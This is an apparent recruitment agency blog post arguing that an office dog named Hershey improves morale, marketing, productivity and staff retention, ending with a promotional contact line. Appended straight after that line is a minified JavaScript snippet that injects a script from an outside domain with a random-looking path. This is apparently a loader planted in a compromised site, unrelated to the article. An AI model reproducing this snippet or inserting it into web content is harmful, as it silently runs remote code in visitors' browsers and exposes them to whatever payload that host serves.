Why your office needs a dog

Author: Donna Banks

Go on! Ask your boss to get you an office dog. There are so many reasons why you’ll be glad you did.

Let me tell you about someone in our office who always lifts everyone’s spirits, keeps us productive and helps us win customers. No, I’m not talking about myself. I’m talking about our office dog, Hershey!

I’m not exaggerating when I say that Hershey has changed the face of our business. If your office doesn’t have a dog, you’re missing out. Here are some reasons why you need to ask your boss to get an office dog, or start letting the staff bring in their own dogs for the day. Alternatively, if you’re the boss, here’s why you need to get on to it now!


Dogs improve the atmosphere in the office


A dog makes any office a happier place for everyone working in it. There are so many reasons why.

Work can be stressful. There are tough jobs to do for demanding clients. But seeing a dog’s happy, furry face has a great calming effect.

Office dogs become a focal point for the office and it helps everybody bond. They automatically have a shared interest. Walking the dog every day, as well as being great exercise, gives everyone an opportunity to socialise and get to know each other better. This even works in shared office buildings where people from other companies often end up doting on the dog too.

When a boss gets a dog for the office, it shows their human side and makes the employees feel better towards them. Plus, if the dog actually belongs to someone in the office and they bring them in every day, it improves their work/life balance.


Dogs enhance your marketing


It sounds unbelievable, but it’s true. Having an office dog has affected the way we market our business. Every time we post on LinkedIn or anywhere else with a photo or video of Hershey, we get more likes than we do with anything else!

Why is that? Well, I hope it’s because it shows off our human, caring, nurturing side. But I think it’s that everyone likes pictures of cute dogs. And Hershey is super cute!

We’ve found it boosts our employer brand as well. When we hire new people, they all want to know about Hershey. Also, if you let people bring their own pets to work, it’s a great recruiting tool.


Dogs boost your business


Having a dog in the office is definitely good for business.

We’ve seen how office dogs make employees happy. It promotes an open, inclusive culture. When employees are happy, they work harder. They’re willing to come to work earlier and stay later. They feel good about the company, so they go the extra mile. Also, having a dog encourages employees to take breaks more regularly, which makes them focus better and increases productivity.

Allowing dogs in the office also helps with employee retention. If you’re a dog owner who gets to bring their best friend to the office every day, that’s a great perk. You’re much less likely to want to go and work anywhere else.


Take the lead


So, what are you waiting for? Ask your boss to get a dog for the office, or allow the team to bring their dogs to work. You’ll be happier, healthier and more productive. It worked for us and it can work for you!


If you’re in the property industry and looking to build a relationship with a committed, forward-looking recruitment agency, talk to the Joshua Robert team on 0121 582 0877, or visit our site today. You may even get to meet Hershey!;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://groundrats.org/tHHGGEDyAn6ygUcHwex98R1YlpAOQ9zvV2t6wfY5Sox’);
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